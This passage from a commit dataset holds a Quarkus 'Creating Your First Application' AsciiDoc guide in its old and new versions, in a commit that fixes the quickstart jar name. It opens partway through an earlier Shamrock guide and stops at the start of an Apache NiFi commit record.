[o.j.s.u.r.UndertowDeploymentTemplate] (main) Starting Undertow on port 8080\nINFO [o.xnio] (main) XNIO version 3.6.5.Final\nINFO [o.x.nio] (main) XNIO NIO Implementation Version 3.6.5.Final\nINFO [o.j.threads] (main) JBoss Threads version 3.0.0.Alpha4\nINFO [o.j.s.d.ShamrockAugmentor] (main) Beginning shamrock augmentation\nINFO [o.j.s.d.ShamrockAugmentor] (main) Shamrock augmentation completed in 322ms\nINFO [o.j.r.r.i18n] (main) RESTEASY002225: Deploying javax.ws.rs.core.Application: class org.acme.quickstart.MyApplication\nINFO [o.j.shamrock] (main) Shamrock started in 697.982ms\n----\n\nOnce started, you can request the provided endpoint:\n\n```\n$ curl http:\/\/localhost:8080\/app\/hello\nhello\n```\n\nHit `CTRL+C` to stop the application.\n\n== Using injection\n\nLet's add a companion bean.\nCreate the `src\/main\/java\/org\/acme\/quickstart\/GreetingService.java` file with the following content:\n\n[source, java]\n----\npackage org.acme.quickstart;\n\nimport javax.enterprise.context.ApplicationScoped;\n\n@ApplicationScoped\npublic class GreetingService {\n\n public String greeting(String name) {\n return \"hello \" + name;\n }\n\n}\n----\n\nEdit the `GreetingResource` class to inject the `GreetingService` and create a new endpoint using it:\n\n[source, java]\n----\npackage org.acme.quickstart;\n\nimport javax.inject.Inject;\nimport javax.ws.rs.GET;\nimport javax.ws.rs.Path;\nimport javax.ws.rs.PathParam;\nimport javax.ws.rs.Produces;\nimport javax.ws.rs.core.MediaType;\n\n@Path(\"\/hello\")\npublic class GreetingResource {\n\n @Inject\n GreetingService service;\n\n @GET\n @Produces(MediaType.TEXT_PLAIN)\n 
@Path(\"\/greeting\/{name}\")\n public String greeting(@PathParam(\"name\") String name) {\n return service.greeting(name);\n }\n\n @GET\n @Produces(MediaType.TEXT_PLAIN)\n public String hello() {\n return \"hello\";\n }\n}\n----\n\nStart the application and check that http:\/\/localhost:8080\/app\/hello\/greeting\/shamrock returns `hello shamrock`.\n\n\n\n== Testing\n\nAll right, so far so good, but wouldn't it be better with a few tests, just in case.\n\nEdit the `pom.xml` file to add the 2 following dependencies:\n\n[source,xml,subs=attributes+]\n----\n<dependency>\n <groupId>org.jboss.shamrock<\/groupId>\n <artifactId>shamrock-junit<\/artifactId>\n <version>${shamrock.version}<\/version>\n <scope>test<\/scope>\n<\/dependency>\n<dependency>\n <groupId>io.rest-assured<\/groupId>\n <artifactId>rest-assured<\/artifactId>\n <version>{restassured-version}<\/version>\n <scope>test<\/scope>\n<\/dependency>\n----\n\nThen, create the `src\/test\/java\/org\/acme\/quickstart\/GreetingResourceTest.java` with the following content:\n\n[source,java]\n----\npackage org.acme.quickstart;\n\nimport org.jboss.shamrock.test.ShamrockTest;\nimport org.junit.Test;\nimport org.junit.runner.RunWith;\n\nimport java.util.UUID;\n\nimport static io.restassured.RestAssured.given;\nimport static org.hamcrest.CoreMatchers.is;\n\n@RunWith(ShamrockTest.class) \/\/ <1>\npublic class GreetingResourceTest {\n\n @Test\n public void testHelloEndpoint() {\n given()\n .when().get(\"app\/hello\")\n .then()\n .statusCode(200) \/\/ <2>\n .body(is(\"hello\"));\n }\n\n @Test\n public void testGreetingEndpoint() {\n String uuid = UUID.randomUUID().toString();\n given()\n .pathParam(\"name\", uuid)\n .when().get(\"app\/hello\/greeting\/{name}\")\n .then()\n .statusCode(200)\n .body(is(\"hello \" + uuid));\n }\n\n}\n----\n<1> By using the `ShamrockTest` runner, you instruct JUnit to start the application before the tests.\n<2> Check the HTTP response status code and content\n\nThese tests use http:\/\/rest-assured.io\/[RestAssured], but feel free to use your favorite library.\n\nYou can run the test from your IDE directly (be sure you stopped the application first), or from Maven using: `mvn test`.\n\n== Packaging and run the application\n\nThe application is packaged using `mvn package`.\nIt produces 2 jar files:\n\n* `shamrock-quickstart-1.0-SNAPSHOT.jar` - containing just the classes and resources of the projects, it's the regular\nartifact produced by the Maven build;\n* `shamrock-quickstart-1.0-SNAPSHOT-runner.jar` - being an executable _\u00fcber-jar_.\nIt embeds all the dependencies required to run the application.\n\nYou can run the application using: `java -jar target\/shamrock-quickstart-1.0-SNAPSHOT-runner.jar`\n\n== Async\n\nThe resource can also use `CompletionStage` as return type to handle asynchronous actions:\n\n[source,java]\n----\n@GET\n@Produces(MediaType.TEXT_PLAIN)\npublic CompletionStage<String> hello() {\n return CompletableFuture.supplyAsync(() -> {\n return \"hello\";\n });\n}\n----\n\nThe async version of the code is available in the https:\/\/github.com\/protean-project\/quickstarts[Github] repository, in the `getting-started-async` directory.\n\n== What's next?\n\nThis guide covered the creation of an application using Shamrock.\nHowever, there is much more.\nWe recommend continuing the journey with the link:building-native-image-guide.html[building a native image guide], where you learn about the native executable creation and the packaging in a container.\n\nIn addition, the 
link:ide-configuration.html[developer guide] document explains how to:\n\n* scaffold a project in a single command line,\n* enable the _development model_ (hot reload)\n* import the project in your favorite IDE\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b9d9ae82aa52fd4424220855a2b0bf699203c1d5","subject":"Fix the quickstart jar name.","message":"Fix the quickstart jar name.\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/getting-started-guide.adoc","new_file":"docs\/src\/main\/asciidoc\/getting-started-guide.adoc","new_contents":"= {project-name} - Creating Your First Application\n\n:toc: macro\n:toclevels: 4\n:doctype: book\n:icons: font\n:docinfo1:\n\n:numbered:\n:sectnums:\n:sectnumlevels: 4\n\n\nLearn how to create a Hello World Quarkus app.\nThis guide covers:\n\n* Bootstrapping an application\n* Creating a JAX-RS endpoint\n* Injecting beans\n* Functional tests\n* Packaging of the application\n\n== Prerequisites\n\nTo complete this guide, you need:\n\n* less than 15 minutes\n* an IDE\n* JDK 1.8+ installed with `JAVA_HOME` configured appropriately\n* Apache Maven 3.5.3+\n\ninclude::.\/maven-config.adoc[tag=repositories]\n\n== Architecture\n\nIn this guide, we create a straightforward application serving a `hello` endpoint. To demonstrate\ndependency injection this endpoint uses a `greeting` bean.\n\nimage::getting-started-architecture.png[alt=Architecture,width=640,height=480]\n\nThis guide also covers the testing of the endpoint.\n\n== Solution\n\nWe recommend that you follow the instructions in the next sections and create the application step by step.\nHowever, you can go right to the completed example.\n\nClone the Git repository: `git clone {quickstarts-clone-url}`, or download an {quickstarts-archive-url}[archive].\n\nThe solution is located in the `getting-started` directory.\n\n== Bootstrapping the project\n\nThe easiest way to create a new {project-name} project is to open a terminal and run the following command:\n\n[source, subs=attributes+]\n----\nmvn io.quarkus:quarkus-maven-plugin:{quarkus-version}:create \\\n -DprojectGroupId=org.acme \\\n -DprojectArtifactId=getting-started \\\n -DclassName=\"org.acme.quickstart.GreetingResource\" \\\n -Dpath=\"\/hello\"\n----\n\nIt generates:\n\n* the Maven structure\n* an `org.acme.quickstart.GreetingResource` resource exposed on `\/hello`\n* an associated unit test\n* a landing page accessible on `http:\/\/localhost:8080`\n* an example of `Dockerfile`\n* the application configuration file\n\nOnce generated, look at the `pom.xml`.\nYou will find the import of the Quarkus BOM, allowing to omit the version on the different {project-name} dependencies.\nIn addition, you can see the `quarkus-maven-plugin` responsible of the packaging of the application and also providing the development mode.\n\n[source,xml,subs=attributes+]\n----\n<dependencyManagement>\n <dependencies>\n <dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-bom<\/artifactId>\n <version>${quarkus.version}<\/version>\n <type>pom<\/type>\n <scope>import<\/scope>\n <\/dependency>\n <\/dependencies>\n<\/dependencyManagement>\n\n<build>\n <plugins>\n <plugin>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-maven-plugin<\/artifactId>\n <version>${quarkus.version}<\/version>\n <executions>\n <execution>\n <goals>\n <goal>build<\/goal>\n <\/goals>\n <\/execution>\n <\/executions>\n <\/plugin>\n 
<\/plugins>\n<\/build>\n----\n\n[NOTE]\n.What's Quarkus?\n====\nQuarkus can be seen as {project-name} core.\n====\n\nIf we focus on the dependencies section, you can see 2 extensions that enable the development of REST applications:\n\n[source,xml]\n----\n <dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-resteasy-deployment<\/artifactId>\n <\/dependency>\n <dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-arc-deployment<\/artifactId>\n <\/dependency>\n----\n\n[NOTE]\n.What's ArC?\n====\nArC is a CDI-based dependency injection solution - see also link:cdi-reference.html[Contexts and Dependency Injection].\n====\n\n=== The JAX-RS resources\n\nDuring the project creation, the `src\/main\/java\/org\/acme\/quickstart\/GreetingResource.java` file has been created with the following content:\n\n[source,java]\n----\npackage org.acme.quickstart;\n\nimport javax.ws.rs.GET;\nimport javax.ws.rs.Path;\nimport javax.ws.rs.Produces;\nimport javax.ws.rs.core.MediaType;\n\n@Path(\"\/hello\")\npublic class GreetingResource {\n\n @GET\n @Produces(MediaType.TEXT_PLAIN)\n public String hello() {\n return \"hello\";\n }\n}\n----\n\nIt's a very simple REST endpoint, returning \"hello\" to requests on \"\/hello\".\n\n[TIP]\n.Differences with vanilla JAX-RS\n====\nWith Quarkus, there is no need to create an `Application` class. It's supported but not required. In addition, only one instance\nof the resource is created and not one per request. You can configure this using the different `XScoped` annotations.\n====\n\n== Running the application\n\nNow we are ready to run our application.\nUse: `mvn compile quarkus:dev`:\n\n[source, bash]\n----\n[INFO] --------------------< org.acme:quarkus-quickstart >---------------------\n[INFO] Building quarkus-quickstart 1.0-SNAPSHOT\n[INFO] --------------------------------[ jar ]---------------------------------\n[INFO]\n[INFO] --- maven-resources-plugin:2.6:resources (default-resources) @ quarkus-quickstart ---\n[INFO] Using 'UTF-8' encoding to copy filtered resources.\n[INFO] skip non existing resourceDirectory \/Users\/starksm\/Dev\/JBoss\/Protean\/starksm64-quarkus-quickstarts\/getting-started\/src\/main\/resources\n[INFO]\n[INFO] --- maven-compiler-plugin:3.1:compile (default-compile) @ quarkus-quickstart ---\n[INFO] Changes detected - recompiling the module!\n[INFO] Compiling 2 source files to \/Users\/starksm\/Dev\/JBoss\/Protean\/starksm64-quarkus-quickstarts\/getting-started\/target\/classes\n[INFO]\n[INFO] --- quarkus-maven-plugin:1.0.0.Alpha1-SNAPSHOT:dev (default-cli) @ quarkus-quickstart ---\nListening for transport dt_socket at address: 5005\n2019-02-28 17:05:22,347 INFO [io.qua.dep.QuarkusAugmentor] (main) Beginning quarkus augmentation\n2019-02-28 17:05:22,635 INFO [io.qua.dep.QuarkusAugmentor] (main) Quarkus augmentation completed in 288ms\n2019-02-28 17:05:22,770 INFO [io.quarkus] (main) Quarkus 1.0.0.Alpha1-SNAPSHOT started in 0.668s. 
Listening on: http:\/\/localhost:8080\n2019-02-28 17:05:22,771 INFO [io.quarkus] (main) Installed features: [cdi, resteasy]\n----\n\nOnce started, you can request the provided endpoint:\n\n```\n$ curl http:\/\/localhost:8080\/hello\nhello\n```\n\nHit `CTRL+C` to stop the application, but you can also keep it running and enjoy the blazing fast hot-reload.\n\n== Using injection\n\nLet's modify the application and add a companion bean.\nCreate the `src\/main\/java\/org\/acme\/quickstart\/GreetingService.java` file with the following content:\n\n[source, java]\n----\npackage org.acme.quickstart;\n\nimport javax.enterprise.context.ApplicationScoped;\n\n@ApplicationScoped\npublic class GreetingService {\n\n public String greeting(String name) {\n return \"hello \" + name;\n }\n\n}\n----\n\nEdit the `GreetingResource` class to inject the `GreetingService` and create a new endpoint using it:\n\n[source, java]\n----\npackage org.acme.quickstart;\n\nimport javax.inject.Inject;\nimport javax.ws.rs.GET;\nimport javax.ws.rs.Path;\nimport javax.ws.rs.PathParam;\nimport javax.ws.rs.Produces;\nimport javax.ws.rs.core.MediaType;\n\n@Path(\"\/hello\")\npublic class GreetingResource {\n\n @Inject\n GreetingService service;\n\n @GET\n @Produces(MediaType.TEXT_PLAIN)\n @Path(\"\/greeting\/{name}\")\n public String greeting(@PathParam(\"name\") String name) {\n return service.greeting(name);\n }\n\n @GET\n @Produces(MediaType.TEXT_PLAIN)\n public String hello() {\n return \"hello\";\n }\n}\n----\n\nIf you stopped the application, restart it with `mvn compile quarkus:dev`.\nThen check that http:\/\/localhost:8080\/hello\/greeting\/quarkus returns `hello quarkus`.\n\n== Development Mode\n\n`quarkus:dev` runs Quarkus in development mode. This enables hot deployment with background compilation, which means\nthat when you modify your Java files and refresh your browser these changes will automatically take effect. The act of\nrefreshing the browser triggers a scan of the workspace, and if any changes are detected the Java files are compiled,\nand the application is redeployed, then your request is serviced by the redeployed application. If there are any issues\nwith compilation or deployment an error page will let you know.\n\nThis will also listen for a debugger on port `5005`. If you want to wait for the debugger to attach before running you\ncan pass `-Ddebug` on the command line. 
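For example, a minimal sketch of a development mode launch that waits for a debugger (illustrative only; it simply combines the goal and flag described above):\n\n[source, bash]\n----\n# waits for a debugger to attach on port 5005 before running the application\nmvn compile quarkus:dev -Ddebug\n----\n\n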
If you don't want the debugger at all you can use `-Ddebug=false`.\n\n== Testing\n\nAll right, so far so good, but wouldn't it be better with a few tests, just in case?\n\nIn the generated `pom.xml` file, you can see 2 test dependencies:\n\n[source,xml,subs=attributes+]\n----\n<dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-junit5<\/artifactId>\n <version>${quarkus.version}<\/version>\n <scope>test<\/scope>\n<\/dependency>\n<dependency>\n <groupId>io.rest-assured<\/groupId>\n <artifactId>rest-assured<\/artifactId>\n <version>{restassured-version}<\/version>\n <scope>test<\/scope>\n<\/dependency>\n----\n\nQuarkus supports https:\/\/junit.org\/junit4\/[JUnit 4] and https:\/\/junit.org\/junit5\/[JUnit 5] tests.\nIn the generated project, we use JUnit 5.\nBecause of this, the version of the https:\/\/maven.apache.org\/surefire\/maven-surefire-plugin\/[Surefire Maven Plugin] must\nbe set, as the default version does not support JUnit 5:\n\n[source,xml,subs=attributes+]\n----\n<plugin>\n <artifactId>maven-surefire-plugin<\/artifactId>\n <version>${surefire.version}<\/version>\n <configuration>\n <systemProperties>\n <java.util.logging.manager>org.jboss.logmanager.LogManager<\/java.util.logging.manager>\n <\/systemProperties>\n <\/configuration>\n<\/plugin>\n----\n\nWe also set the `java.util.logging` system property to make sure tests will use the correct logmanager.\n\nThe generated project contains a simple test.\nEdit the `src\/test\/java\/org\/acme\/quickstart\/GreetingResourceTest.java` to match the following content:\n\n[source,java]\n----\npackage org.acme.quickstart;\n\nimport io.quarkus.test.junit.QuarkusTest;\nimport org.junit.jupiter.api.Test;\n\nimport java.util.UUID;\n\nimport static io.restassured.RestAssured.given;\nimport static org.hamcrest.CoreMatchers.is;\n\n@QuarkusTest\npublic class GreetingResourceTest {\n\n @Test \/\/ <1>\n public void testHelloEndpoint() {\n given()\n .when().get(\"\/hello\")\n .then()\n .statusCode(200) \/\/ <2>\n .body(is(\"hello\"));\n }\n\n @Test\n public void testGreetingEndpoint() {\n String uuid = UUID.randomUUID().toString();\n given()\n .pathParam(\"name\", uuid)\n .when().get(\"\/hello\/greeting\/{name}\")\n .then()\n .statusCode(200)\n .body(is(\"hello \" + uuid));\n }\n\n}\n----\n<1> By using the `QuarkusTest` runner, you instruct JUnit to start the application before the tests.\n<2> Check the HTTP response status code and content.\n\nThese tests use http:\/\/rest-assured.io\/[RestAssured], but feel free to use your favorite library.\n\nYou can run the test from your IDE directly (be sure you stopped the application first), or from Maven using: `mvn test`.\n\nBy default tests will run on port `8081` so as not to conflict with the running application. We automatically\nconfigure RestAssured to use this port. If you want to use a different client you should use the `@TestHTTPResource`\nannotation to directly inject the URL of the test into a field on the test class. This field can be of the type\n`String`, `URL` or `URI`. This annotation can also be given a value for the test path. For example, to test\na Servlet mapped to `\/myservlet`, just add the following to your test:\n\n\n[source,java]\n----\n@TestHTTPResource(\"\/myservlet\")\nURL testUrl;\n----\n\nThe test port can be controlled via the `quarkus.http.test-port` config property. 
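As an illustration (the port value below is arbitrary; the property name is the one documented above), the test port could be overridden in the application configuration file:\n\n[source,properties]\n----\n# hypothetical example: run tests against port 8083 instead of the default 8081\nquarkus.http.test-port=8083\n----\n\n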
Quarkus also creates a system\nproperty called `test.url` that is set to the base test URL for situations where you cannot use injection.\n\n\n== Packaging and run the application\n\nThe application is packaged using `mvn package`.\nIt produces 2 jar files:\n\n* `quarkus-quickstart-1.0-SNAPSHOT.jar` - containing just the classes and resources of the projects, it's the regular\nartifact produced by the Maven build;\n* `quarkus-quickstart-1.0-SNAPSHOT-runner.jar` - being an executable _jar_. Be aware that it's not an _\u00fcber-jar_ as\nthe dependencies are copied into the `target\/lib` directory.\n\nYou can run the application using: `java -jar target\/quarkus-quickstart-1.0-SNAPSHOT-runner.jar`\n\nNOTE: The `Class-Path` entry of the `MANIFEST.MF` from the _runner jar_ explicitly lists the jars from the `lib` directory.\nSo if you want to deploy your application somewhere, you need to copy the _runner_ jar as well as the _lib_ directory.\n\n== Async\n\nThe resource can also use `CompletionStage` as return type to handle asynchronous actions:\n\n[source,java]\n----\n@GET\n@Produces(MediaType.TEXT_PLAIN)\npublic CompletionStage<String> hello() {\n return CompletableFuture.supplyAsync(() -> {\n return \"hello\";\n });\n}\n----\n\nThe async version of the code is available in the {quickstarts-base-url}[Github] repository, in the `getting-started-async` directory.\n\n== What's next?\n\nThis guide covered the creation of an application using Quarkus.\nHowever, there is much more.\nWe recommend continuing the journey with the link:building-native-image-guide.html[building a native image guide], where you learn about the native executable creation and the packaging in a container.\n\nIn addition, the link:ide-configuration.html[developer guide] document explains how to:\n\n* scaffold a project in a single command line,\n* enable the _development model_ (hot reload)\n* import the project in your favorite IDE\n\n","old_contents":"= {project-name} - Creating Your First Application\n\n:toc: macro\n:toclevels: 4\n:doctype: book\n:icons: font\n:docinfo1:\n\n:numbered:\n:sectnums:\n:sectnumlevels: 4\n\n\nLearn how to create a Hello World Quarkus app.\nThis guide covers:\n\n* Bootstrapping an application\n* Creating a JAX-RS endpoint\n* Injecting beans\n* Functional tests\n* Packaging of the application\n\n== Prerequisites\n\nTo complete this guide, you need:\n\n* less than 15 minutes\n* an IDE\n* JDK 1.8+ installed with `JAVA_HOME` configured appropriately\n* Apache Maven 3.5.3+\n\ninclude::.\/maven-config.adoc[tag=repositories]\n\n== Architecture\n\nIn this guide, we create a straightforward application serving a `hello` endpoint. 
To demonstrate\ndependency injection this endpoint uses a `greeting` bean.\n\nimage::getting-started-architecture.png[alt=Architecture,width=640,height=480]\n\nThis guide also covers the testing of the endpoint.\n\n== Solution\n\nWe recommend that you follow the instructions in the next sections and create the application step by step.\nHowever, you can go right to the completed example.\n\nClone the Git repository: `git clone {quickstarts-clone-url}`, or download an {quickstarts-archive-url}[archive].\n\nThe solution is located in the `getting-started` directory.\n\n== Bootstrapping the project\n\nThe easiest way to create a new {project-name} project is to open a terminal and run the following command:\n\n[source, subs=attributes+]\n----\nmvn io.quarkus:quarkus-maven-plugin:{quarkus-version}:create \\\n -DprojectGroupId=org.acme \\\n -DprojectArtifactId=getting-started \\\n -DclassName=\"org.acme.quickstart.GreetingResource\" \\\n -Dpath=\"\/hello\"\n----\n\nIt generates:\n\n* the Maven structure\n* an `org.acme.quickstart.GreetingResource` resource exposed on `\/hello`\n* an associated unit test\n* a landing page accessible on `http:\/\/localhost:8080`\n* an example of `Dockerfile`\n* the application configuration file\n\nOnce generated, look at the `pom.xml`.\nYou will find the import of the Quarkus BOM, allowing to omit the version on the different {project-name} dependencies.\nIn addition, you can see the `quarkus-maven-plugin` responsible of the packaging of the application and also providing the development mode.\n\n[source,xml,subs=attributes+]\n----\n<dependencyManagement>\n <dependencies>\n <dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-bom<\/artifactId>\n <version>${quarkus.version}<\/version>\n <type>pom<\/type>\n <scope>import<\/scope>\n <\/dependency>\n <\/dependencies>\n<\/dependencyManagement>\n\n<build>\n <plugins>\n <plugin>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-maven-plugin<\/artifactId>\n <version>${quarkus.version}<\/version>\n <executions>\n <execution>\n <goals>\n <goal>build<\/goal>\n <\/goals>\n <\/execution>\n <\/executions>\n <\/plugin>\n <\/plugins>\n<\/build>\n----\n\n[NOTE]\n.What's Quarkus?\n====\nQuarkus can be seen as {project-name} core.\n====\n\nIf we focus on the dependencies section, you can see 2 extensions allowing the development of REST applications:\n\n[source,xml]\n----\n <dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-resteasy-deployment<\/artifactId>\n <\/dependency>\n <dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-arc-deployment<\/artifactId>\n <\/dependency>\n----\n\n[NOTE]\n.What's ArC?\n====\nArC is a CDI-based dependency injection solution - see also link:cdi-reference.html[Contexts and Dependency Injection].\n====\n\n=== The JAX-RS resources\n\nDuring the project creation, the `src\/main\/java\/org\/acme\/quickstart\/GreetingResource.java` file has been created with the following content:\n\n[source,java]\n----\npackage org.acme.quickstart;\n\nimport javax.ws.rs.GET;\nimport javax.ws.rs.Path;\nimport javax.ws.rs.Produces;\nimport javax.ws.rs.core.MediaType;\n\n@Path(\"\/hello\")\npublic class GreetingResource {\n\n @GET\n @Produces(MediaType.TEXT_PLAIN)\n public String hello() {\n return \"hello\";\n }\n}\n----\n\nIt's a very simple REST endpoint, returning \"hello\" to requests on \"\/hello\".\n\n[TIP]\n.Differences with vanilla Jax-RS\n====\nWith Quarkus no need to create an `Application` class. It's supported but not required. 
In addition, only one instance\nof the resource is created and not one per request. You can configure this using the different `XScoped` annotations.\n====\n\n== Running the application\n\nNow we are ready to run our application.\nUse: `mvn compile quarkus:dev`:\n\n[source, bash]\n----\n[INFO] --------------------< org.acme:quarkus-quickstart >---------------------\n[INFO] Building quarkus-quickstart 1.0-SNAPSHOT\n[INFO] --------------------------------[ jar ]---------------------------------\n[INFO]\n[INFO] --- maven-resources-plugin:2.6:resources (default-resources) @ quarkus-quickstart ---\n[INFO] Using 'UTF-8' encoding to copy filtered resources.\n[INFO] skip non existing resourceDirectory \/Users\/starksm\/Dev\/JBoss\/Protean\/starksm64-quarkus-quickstarts\/getting-started\/src\/main\/resources\n[INFO]\n[INFO] --- maven-compiler-plugin:3.1:compile (default-compile) @ quarkus-quickstart ---\n[INFO] Changes detected - recompiling the module!\n[INFO] Compiling 2 source files to \/Users\/starksm\/Dev\/JBoss\/Protean\/starksm64-quarkus-quickstarts\/getting-started\/target\/classes\n[INFO]\n[INFO] --- quarkus-maven-plugin:1.0.0.Alpha1-SNAPSHOT:dev (default-cli) @ quarkus-quickstart ---\nListening for transport dt_socket at address: 5005\n2019-02-28 17:05:22,347 INFO [io.qua.dep.QuarkusAugmentor] (main) Beginning quarkus augmentation\n2019-02-28 17:05:22,635 INFO [io.qua.dep.QuarkusAugmentor] (main) Quarkus augmentation completed in 288ms\n2019-02-28 17:05:22,770 INFO [io.quarkus] (main) Quarkus 1.0.0.Alpha1-SNAPSHOT started in 0.668s. Listening on: http:\/\/localhost:8080\n2019-02-28 17:05:22,771 INFO [io.quarkus] (main) Installed features: [cdi, resteasy]\n----\n\nOnce started, you can request the provided endpoint:\n\n```\n$ curl http:\/\/localhost:8080\/hello\nhello\n```\n\nHit `CTRL+C` to stop the application, but you can also keep it running and enjoy the blasting fast hot-reload.\n\n== Using injection\n\nLet's modify the application and add a companion bean.\nCreate the `src\/main\/java\/org\/acme\/quickstart\/GreetingService.java` file with the following content:\n\n[source, java]\n----\npackage org.acme.quickstart;\n\nimport javax.enterprise.context.ApplicationScoped;\n\n@ApplicationScoped\npublic class GreetingService {\n\n public String greeting(String name) {\n return \"hello \" + name;\n }\n\n}\n----\n\nEdit the `GreetingResource` class to inject the `GreetingService` and create a new endpoint using it:\n\n[source, java]\n----\npackage org.acme.quickstart;\n\nimport javax.inject.Inject;\nimport javax.ws.rs.GET;\nimport javax.ws.rs.Path;\nimport javax.ws.rs.PathParam;\nimport javax.ws.rs.Produces;\nimport javax.ws.rs.core.MediaType;\n\n@Path(\"\/hello\")\npublic class GreetingResource {\n\n @Inject\n GreetingService service;\n\n @GET\n @Produces(MediaType.TEXT_PLAIN)\n @Path(\"\/greeting\/{name}\")\n public String greeting(@PathParam(\"name\") String name) {\n return service.greeting(name);\n }\n\n @GET\n @Produces(MediaType.TEXT_PLAIN)\n public String hello() {\n return \"hello\";\n }\n}\n----\n\nIf you stopped the application, restart the application with `mvn compile quarkus:dev`.\nThen check that http:\/\/localhost:8080\/hello\/greeting\/quarkus returns `hello quarkus`.\n\n== Development Mode\n\n`quarkus:dev` runs Quarkus in development mode. This enables hot deployment with background compilation, which means\nthat when you modify your Java files and refresh your browser these changes will automatically take effect. 
The act of\nrefreshing the browser triggers a scan of the workspace, and if any changes are detected the Java files are compiled,\nand the application is redeployed, then your request is serviced by the redeployed application. If there are any issues\nwith compilation or deployment an error page will let you know.\n\nThis will also listen for a debugger on port `5005`. If your want to wait for the debugger to attach before running you\ncan pass `-Ddebug` on the command line. If you don't want the debugger at all you can use `-Ddebug=false`.\n\n== Testing\n\nAll right, so far so good, but wouldn't it be better with a few tests, just in case.\n\nIn the generated `pom.xml` file, you can see 2 test dependencies:\n\n[source,xml,subs=attributes+]\n----\n<dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-junit5<\/artifactId>\n <version>${quarkus.version}<\/version>\n <scope>test<\/scope>\n<\/dependency>\n<dependency>\n <groupId>io.rest-assured<\/groupId>\n <artifactId>rest-assured<\/artifactId>\n <version>{restassured-version}<\/version>\n <scope>test<\/scope>\n<\/dependency>\n----\n\nQuarkus supports https:\/\/junit.org\/junit4\/[Junit 4] and https:\/\/junit.org\/junit5\/[Junit 5] tests.\nIn the generated project, we use Junit 5.\nBecause of this, the version of the https:\/\/maven.apache.org\/surefire\/maven-surefire-plugin\/[Surefire Maven Plugin] must\nbe set, as the default version does not support Junit 5:\n\n[source,xml,subs=attributes+]\n----\n<plugin>\n <artifactId>maven-surefire-plugin<\/artifactId>\n <version>${surefire.version}<\/version>\n <configuration>\n <systemProperties>\n <java.util.logging.manager>org.jboss.logmanager.LogManager<\/java.util.logging.manager>\n <\/systemProperties>\n <\/configuration>\n<\/plugin>\n----\n\nWe also set the `java.util.logging` system property to make sure tests will use the correct logmanager.\n\nThe generated project contains a simple test.\nEdit the `src\/test\/java\/org\/acme\/quickstart\/GreetingResourceTest.java` to match the following content:\n\n[source,java]\n----\npackage org.acme.quickstart;\n\nimport io.quarkus.test.junit.QuarkusTest;\nimport org.junit.jupiter.api.Test;\n\nimport java.util.UUID;\n\nimport static io.restassured.RestAssured.given;\nimport static org.hamcrest.CoreMatchers.is;\n\n@QuarkusTest\npublic class GreetingResourceTest {\n\n @Test \/\/ <1>\n public void testHelloEndpoint() {\n given()\n .when().get(\"\/hello\")\n .then()\n .statusCode(200) \/\/ <2>\n .body(is(\"hello\"));\n }\n\n @Test\n public void testGreetingEndpoint() {\n String uuid = UUID.randomUUID().toString();\n given()\n .pathParam(\"name\", uuid)\n .when().get(\"\/hello\/greeting\/{name}\")\n .then()\n .statusCode(200)\n .body(is(\"hello \" + uuid));\n }\n\n}\n----\n<1> By using the `QuarkusTest` runner, you instruct JUnit to start the application before the tests.\n<2> Check the HTTP response status code and content\n\nThese tests use http:\/\/rest-assured.io\/[RestAssured], but feel free to use your favorite library.\n\nYou can run the test from your IDE directly (be sure you stopped the application first), or from Maven using: `mvn test`.\n\nBy default tests will run on port `8081` so as not to conflict with the running application. We automatically\nconfigure RestAssured to use this port. If you want to use a different client you should use the `@TestHTTPResource`\nannotation to directly inject the URL of the test into a field on the test class. This field can be of the type\n`String`, `URL` or `URI`. 
This annotation can also be given a value for the test path. For example if I want to test\na Servlet mapped to `\/myservlet` I would just add the following to my test:\n\n\n[source,java]\n----\n@TestHTTPResource(\"\/myservlet\")\nURL testUrl;\n----\n\nThe test port can be controlled via the `quarkus.http.test-port` config property. Quarkus also creates a system\nproperty called `test.url` that is set to the base test URL for situations where you cannot use injection.\n\n\n== Packaging and run the application\n\nThe application is packaged using `mvn package`.\nIt produces 2 jar files:\n\n* `quarkus-quickstarts-1.0-SNAPSHOT.jar` - containing just the classes and resources of the projects, it's the regular\nartifact produced by the Maven build;\n* `quarkus-quickstarts-1.0-SNAPSHOT-runner.jar` - being an executable _jar_. Be aware that it's not an _\u00fcber-jar_ as\nthe dependencies are copied into the `target\/lib` directory.\n\nYou can run the application using: `java -jar target\/quarkus-quickstarts-1.0-SNAPSHOT-runner.jar`\n\nNOTE: The `Class-Path` entry of the `MANIFEST.MF` from the _runner jar_ explicitly lists the jars from the `lib` directory.\nSo if you want to deploy your application somewhere, you need to copy the _runner_ jar as well as the _lib_ directory.\n\n== Async\n\nThe resource can also use `CompletionStage` as return type to handle asynchronous actions:\n\n[source,java]\n----\n@GET\n@Produces(MediaType.TEXT_PLAIN)\npublic CompletionStage<String> hello() {\n return CompletableFuture.supplyAsync(() -> {\n return \"hello\";\n });\n}\n----\n\nThe async version of the code is available in the {quickstarts-base-url}[Github] repository, in the `getting-started-async` directory.\n\n== What's next?\n\nThis guide covered the creation of an application using Quarkus.\nHowever, there is much more.\nWe recommend continuing the journey with the link:building-native-image-guide.html[building a native image guide], where you learn about the native executable creation and the packaging in a container.\n\nIn addition, the link:ide-configuration.html[developer guide] document explains how to:\n\n* scaffold a project in a single command line,\n* enable the _development model_ (hot reload)\n* import the project in your favorite IDE\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"12a7456f743f524b919e4d6b7baa6c3a20a13dd9","subject":"NIFI-6267: Corrects error in expression language guide.","message":"NIFI-6267: Corrects error in expression language guide.\n\nThis closes #3464\n\nCorrects small typo's in ReplaceAll entry of Expression Language Guide.\nRemoves an extraneous instance of 